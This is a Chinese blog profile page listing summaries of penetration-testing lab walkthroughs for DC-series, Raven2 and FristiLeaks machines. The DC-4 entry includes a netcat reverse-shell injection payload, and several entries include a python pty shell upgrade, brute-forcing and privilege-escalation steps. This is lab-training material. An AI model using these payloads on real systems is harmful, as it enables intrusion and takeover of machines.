自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 收藏
  • 关注

原创 主机发现和端口扫描命令

主机发现和端口扫描命令

2024-01-09 19:51:10 365

原创 DC-1靶机渗透测试

思路:信息收集→漏洞探测→漏洞利用→提权

2023-12-20 22:43:16 929 1

原创 DC-6靶机渗透测试

hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到后台登录地址searchsploit搜索Activity monitor插件的相关漏洞,得到漏洞利用文件运行漏洞利用文件,得到反弹shell打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命

2023-12-20 21:24:58 874 1

原创 DC-4靶机渗透测试

1、使用kali的字典爆破登录密码: /usr/share/john下的password.lstburp抓包,并且爆破到admin账号的密码2、发现命令执行,进行利用:burp修改数据包添加反弹shell的相关命令发送到靶机,kali监听到获取shell反弹radio=nc+192.168.182.146+4444+-e+/bin/bash&submit=Run3、利用python获取交互shell:python -c 'import pty;pty.spawn("/bin/sh")

2023-12-20 18:03:57 742 1

原创 DC-3靶机渗透测试

此文件给出了打穿靶机的关键,就是提到root权限就可以拿到flag,我们进行网站漏洞测试,发现了文件上传漏洞,在Templates/Templates/Beez3。最终我们将账户与密码爆出,但密码进行了哈希加密,我们使用kali自带解密工具john进行解密,我们先将加密密文放入txt文件中,在进行解密。这里他告诉了可以使用溢出提权(exp提权),并提供了提权工具,以及使用方法,使用wget进行工具下载。啥也没有,命令提权此方法行不通,突然想到可以用操作系统漏洞提权,先查看linux版本。

2023-12-19 23:08:22 930 1

原创 DC-2靶机渗透测试

使用ssh登录后台,绕过rbash,git提权

2023-12-19 20:29:32 407 1

原创 Raven2靶机渗透测试

利用shell反弹进入后台,找到数据库文件获取数据库用户名和密码,利用数据库mysql漏洞进行提权

2023-12-06 21:36:53 413 1

原创 Centos7 使用mariadb数据库mysql

安装mysql数据库,如何使用mysql数据库,增删改查等操作命令

2023-12-05 21:51:42 559

原创 Apacbe Tomcat 9.0.40靶机渗透测试

Apacbe Tomcat9.0.40靶机渗透,利用火狐脚本进行提权

2023-12-05 17:44:00 411

原创 FristiLeaks靶机渗透测试

利用反弹shell进入后台,sudo-l进行提权

2023-12-04 21:35:31 402

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除